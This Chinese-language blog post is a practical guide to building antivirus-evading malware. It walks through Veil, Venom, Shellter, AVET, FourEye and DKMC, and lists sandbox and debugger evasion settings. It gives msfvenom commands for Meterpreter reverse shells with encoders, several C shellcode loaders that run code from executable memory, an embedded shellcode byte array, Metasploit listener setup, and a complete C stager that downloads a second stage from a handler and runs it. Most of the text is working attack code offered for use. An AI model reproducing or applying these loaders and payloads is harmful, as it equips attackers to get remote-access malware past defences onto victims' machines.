免殺知識匯總
一顆小胡椒2021-08-25 23:11:00
一、殺軟常見的三種方式
靜態查殺(郵件類查殺一般是靜態的)-->一般根據特征碼識別到-->對文件進行特征匹配的思路
云查殺
行為查殺(也可以理解為動態查殺)-->對其產生的行為進行檢測
3.1 可構建行為庫進行動態查殺
3.2 可構建日志庫對日志庫進行動態查殺
3.3 統計學檢測-->構建特征學習模型-->進行動態查獲取就好了
二、免殺的三種常用方式
①捆綁-->文件捆綁,自解壓捆綁,如exe類型的
②特征碼混淆思路-->即混淆特征碼進而繞過免殺
三種方式:
2.1 代碼混淆
2.2 api鉤子(函數混淆類)-->典型dll劫持類型-->即偽造一個dll文件,然后在調用dll文件的時候,先調用偽造的dll文件,在調用真實的dll文件,進而實現處理木馬的操作。
2.3 溢出類型漏洞特點類
③白名單-->原理:殺毒軟件對自己旗下的軟件不檢測導致
三、利用工具實現免殺
1,veil工具基礎實現免殺+進階
①啟動方法
cd /optlsveil(運行veil即可)
使用方法
如 生成go語言的免殺馬
use 1listuse 16set lhost ipset lport 端口generate#(執行即可)
監聽–>利用msf進行監聽即可
use exploit/multi/handler#選擇監聽模塊類msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lport 3334msf5 exploit(multi/handler) > set lport 10.211.55.2msf5 exploit(multi/handler) > exploit
②結合cs進行免殺
實操(生成go語言的免殺馬)
1)、cs使用生成一個go語言類型的payload
2)、use1 use 17
3)需要的設置變量類(具體參數設置的含義)
BADMACS 設置為Y表示 查看運行環境的MAC地址如果不是虛擬機才會執行payload (反調試)CLICKTRACK 設置為4表示 表示需要4次點擊才會執行CURSORCHECK 設置為100表示 運行環境的硬盤大小如果大于100GB才會執行payload (反沙箱)COMPILE_TO_EXE 設置為Y表示 編譯為exe文件HOSTNAME 設置為Comp1表示 只有在Hostname計算機名為Comp1時才會執行payload(指定目標環境 反沙箱的方式)INJECT_METHOD 可設置為Virtual 或 HeapMINPROCS 設置為20表示 只有運行環境的運行進程數大于20時才會執行payload(指定目標環境 反沙箱的方式)PROCCHECK 設置為Y表示 只有運行環境的進程中沒有虛擬機進程時才會執行payload(指定目標環境 反沙箱的方式)PROCESSORS 設置為2表示 只在至少2核的機器中才會執行payload(指定目標環境 反沙箱的方式)RAMCHECK 設置為Y表示 只在運行環境的內存為3G以上時才會執行payload(指定目標環境 反沙箱的方式)SLEEP 設置為10表示 休眠10秒 以檢測是否運行過程中被加速(反沙箱)USERNAME 設置為Tom表示 只有在當前用戶名為Tom的機器中才執行payload。USERPROMPT 設置為Y表示 在injection之前提醒用戶(提示一個錯誤框,讓用戶誤以為該程序執行錯誤才無法打開)DEBUGGER 設置為Y表示 當被調試器不被attached時才會執行payload (反調試)DOMAIN 設置為Comp表示 受害者計算機只有加入Comp域中時,才會執行payload(指定目標環境 反沙箱的方式)UTCCHECK 設置為Y表示 只在運行環境的系統使用UTC時間時,才會執行payload
4)設置
set USERNAME lll#前三個均表示在該特定的情況下執行這個木馬set HOSTNAME win7set UTCcheck TRUEset UTCcheck TRUEgenerate#(即代表設置完成的含義狀況特點)
5)然后選擇3,即自定義字符串的含義
輸入cs生成的字符串即可
6)設置名字
即可完成組合拳
③結合mingw-w64
生成payload后
利用mingw-w64進行編譯進行實現免殺的作用
gcc -o c.exe c.c -l ws2_32#即過濾掉該命令的狀況思路
2,venom免殺
打開方法
./venom.sh
windows下的基礎免殺
命令步驟
24#輸入ip,輸入端口#選擇常規的windows/meterperter/reverse_tcp#輸入文件名#后面均選默認即可
3,利用kali自帶的shellter進行免殺
基礎生成命令
選擇A#(即自動模式)選擇注入的程序選擇是否要用隱身模式(建議不使用,免殺效果會變差)選擇自定義字符還是自動字符選擇模塊#一般是選擇1模塊設置ip,設置端口
監聽方法
handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp(監聽方法)
4、利用avet實現免殺
運行
#進入其的目錄#然后 python 其py程序即可
一般是直接選擇2生成一個payload
四、利用源碼編譯+加載器加載代碼實現免殺
方式一
cs+c語言代碼組合拳
可參考:https://blog.csdn.net/qq_33942040/article/details/106463360
方式二,msf+c語言源代碼
思路和cs實現免殺的思路差不多,利用編譯進行繞過實現的
①首先現在msf中生成shellcode
c語言代碼1
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f c -o shell.c
②在c語言代碼的buf[]=中添加該shell然后進行編譯即可
unsigned char buf[] =
"shellcode";
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制臺程序不出黑窗口
main()
{
( (void(*)(void))&buf)();
}
c語言代碼2
免殺生成出現問題
#include #include #include
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制臺程序不出黑窗口
unsigned char buf[] = "shellcode";
main()
{ char *Memory;
Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}
#include#includeunsigned char buf[] ="\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52""\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1""\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b""\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03""\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b""\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24""\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb""\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c""\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54""\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x2b\x99""\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50""\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5""\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67""\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff""\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00""\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56""\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58""\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5""\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85""\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1""\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
size_t size = sizeof(buf);int main(){ char *inject; inject = (char*)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //分配可讀可寫可執行 memcpy(inject, buf, size);//復制大小進去 ((void(*)())inject)();//執行
}
c語言代碼3
#include #include #pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";
void main(){
__asm {
mov eax, offset shellcode jmp eax
}}
c語言代碼4
#include #include
unsigned char buf[] ="";
void main(){ ((void(WINAPI*)(void))&buf)();}
c語言代碼5(匯編花指令)
注意:生成的exe文件需要環境中有幾個.dll文件才可運
#include #include #pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";
void main(){ __asm {
mov eax, offset shellcode _emit 0xFF _emit 0xE0
}}
c語言代碼6
base4.c代碼
/* Base64 encoder/decoder. Originally Apache file ap_base64.c*/
#include
#include "base64.h"
/* aaaack but it's fast and const should make it shared text page. */static const unsigned char pr2six[256] ={ /* ASCII table */ 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64};
int Base64decode_len(const char *bufcoded){ int nbytesdecoded; register const unsigned char *bufin; register int nprbytes;
bufin = (const unsigned char *)bufcoded; while (pr2six[*(bufin++)] <= 63);
nprbytes = (bufin - (const unsigned char *)bufcoded) - 1; nbytesdecoded = ((nprbytes + 3) / 4) * 3;
return nbytesdecoded + 1;}
int Base64decode(char *bufplain, const char *bufcoded){ int nbytesdecoded; register const unsigned char *bufin; register unsigned char *bufout; register int nprbytes;
bufin = (const unsigned char *)bufcoded; while (pr2six[*(bufin++)] <= 63); nprbytes = (bufin - (const unsigned char *)bufcoded) - 1; nbytesdecoded = ((nprbytes + 3) / 4) * 3;
bufout = (unsigned char *)bufplain; bufin = (const unsigned char *)bufcoded;
while (nprbytes > 4) { *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); bufin += 4; nprbytes -= 4; }
/* Note: (nprbytes == 1) would be an error, so just ingore that case */ if (nprbytes > 1) { *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); } if (nprbytes > 2) { *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); } if (nprbytes > 3) { *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); }
*(bufout++) = '\0'; nbytesdecoded -= (4 - nprbytes) & 3; return nbytesdecoded;}
static const char basis_64[] ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int Base64encode_len(int len){ return ((len + 2) / 3 * 4) + 1;}
int Base64encode(char *encoded, const char *string, int len){ int i; char *p;
p = encoded; for (i = 0; i < len - 2; i += 3) { *p++ = basis_64[(string[i] >> 2) & 0x3F]; *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)]; *p++ = basis_64[((string[i + 1] & 0xF) << 2) | ((int)(string[i + 2] & 0xC0) >> 6)]; *p++ = basis_64[string[i + 2] & 0x3F]; } if (i < len) { *p++ = basis_64[(string[i] >> 2) & 0x3F]; if (i == (len - 1)) { *p++ = basis_64[((string[i] & 0x3) << 4)]; // *p++ = '='; } else { *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)]; *p++ = basis_64[((string[i + 1] & 0xF) << 2)]; } //*p++ = '='; }
*p++ = '\0'; return p - encoded;}
base64.h代碼
#ifndef _BASE64_H_#define _BASE64_H_
#ifdef __cplusplusextern "C" {#endif
int Base64encode_len(int len); int Base64encode(char * coded_dst, const char *plain_src, int len_plain_src);
int Base64decode_len(const char * coded_src); int Base64decode(char * plain_dst, const char *coded_src);
#ifdef __cplusplus}#endif
#endif //_BASE64_H_shellcode.c
#include #include #include
#include "base64.h"
unsigned char buf[] ="msf base64 code here";
int main(int argc, const char * argv[]) {
char str1[1000] = { 0 }; Base64decode(str1, buf);
//printf("%d ", sizeof(str3)); char *Memory; Memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, str1, sizeof(str1)); ((void(*)())Memory)(); return 0;}
msf生成base64的shellcode
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=10.211.55.2 lport=3333 -f c > shell.c
gcc編碼
gcc shellcode.c base64.c -o test.exe
③進行監聽
use multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 10.211.55.2set LPORT 3333set EnableStageEncoding true
五、FourEye免殺
kali環境下使用
直接使用即可
python3 BypassFramework.py
加載器方法
1.使用shellcode_launcher
①生成raw格式的shellcode
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f raw -o shellcode.raw
②
shellcode_launcher執行產生exe文件
shellcode_launcher.exe -i shellcode.raw#1
六、DKMC免殺
[*] (gen) 將msf的shellcode注入到一個BMP圖像[*] (web) 啟動web服務用來分發BMP圖像[*] (ps) 生成ps的payload[*] (sc) 將msf生成的raw文件轉為shellcode[*] (exit) 退出
生成步驟與原理
先利用msf生成raw文件利用sc講raw文件轉換為shellcode利用gen將上一步的shellcode注入到一個BMP圖像利用ps生成基于powershell的BMP文件的payload用web提供的簡單web服務進行分發BMP文件https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg 詳細參考教程:https://www.freebuf.com/articles/system/227463.htmlhttps://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html
七、思維導圖
meta64位過殺軟
過32位
/* * A C-based stager client compat with the Metasploit Framework * based on a discussion on the Metasploit Framework mailing list * * @作者 Raphael Mudge (raffi@strategiccyber.com) * @license BSD License. * * Relevant messages: * * http://mail.metasploit.com/pipermail/framework/2012-9月/008660.html * * http://mail.metasploit.com/pipermail/framework/2012-9月/008664.html */
#include #include #include #include
/* init winsock */void winsock_init() { WSADATA wsaData; WORD wVersionRequested;
wVersionRequested = MAKEWORD(2, 2);
if (WSAStartup(wVersionRequested, &wsaData) < 0) { printf("ws2_32.dll is out of date."); WSACleanup(); exit(1); }}
/* a quick routine to quit and report why we quit */void punt(SOCKET my_socket, char * error) { printf("Bad things: %s", error); closesocket(my_socket); WSACleanup(); exit(1);}
/* attempt to receive all of the requested data from the socket */int recv_all(SOCKET my_socket, void * buffer, int len) { int tret = 0; int nret = 0; void * startb = buffer; while (tret < len) { nret = recv(my_socket, (char *)startb, len - tret, 0); startb += nret; tret += nret;
if (nret == SOCKET_ERROR) punt(my_socket, "Could not receive data"); } return tret;}
/* establish a connection to a host:port */SOCKET wsconnect(char * targetip, int port) { struct hostent * target; struct sockaddr_in sock; SOCKET my_socket;
/* setup our socket */ my_socket = socket(AF_INET, SOCK_STREAM, 0); if (my_socket == INVALID_SOCKET) punt(my_socket, "Could not initialize socket");
/* resolve our target */ target = gethostbyname(targetip); if (target == NULL) punt(my_socket, "Could not resolve target");
/* copy our target information into the sock */ memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length); sock.sin_family = AF_INET; sock.sin_port = htons(port);
/* attempt to connect */ if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) ) punt(my_socket, "Could not connect to target");
return my_socket;}
int main(int argc, char * argv[]) { ULONG32 size; char * buffer; void (*function)();
winsock_init();
if (argc != 3) { printf("%s [host] [port]", argv[0]); exit(1); }
/* connect to the handler */ SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));
/* read the 4-byte length */ int count = recv(my_socket, (char *)&size, 4, 0); if (count != 4 || size <= 0) punt(my_socket, "read a strange or incomplete length value");
/* allocate a RWX buffer */ buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (buffer == NULL) punt(my_socket, "could not allocate buffer");
/* prepend a little assembly to move our SOCKET value to the EDI register thanks mihi for pointing this out BF 78 56 34 12 => mov edi, 0x12345678 */ buffer[0] = 0xBF;
/* copy the value of our socket to the buffer */ memcpy(buffer + 1, &my_socket, 4);
/* read bytes into the buffer */ count = recv_all(my_socket, buffer + 5, size);
/* cast our buffer as a function and call it */ function = (void (*)())buffer; function();
return 0;}
一顆小胡椒
暫無描述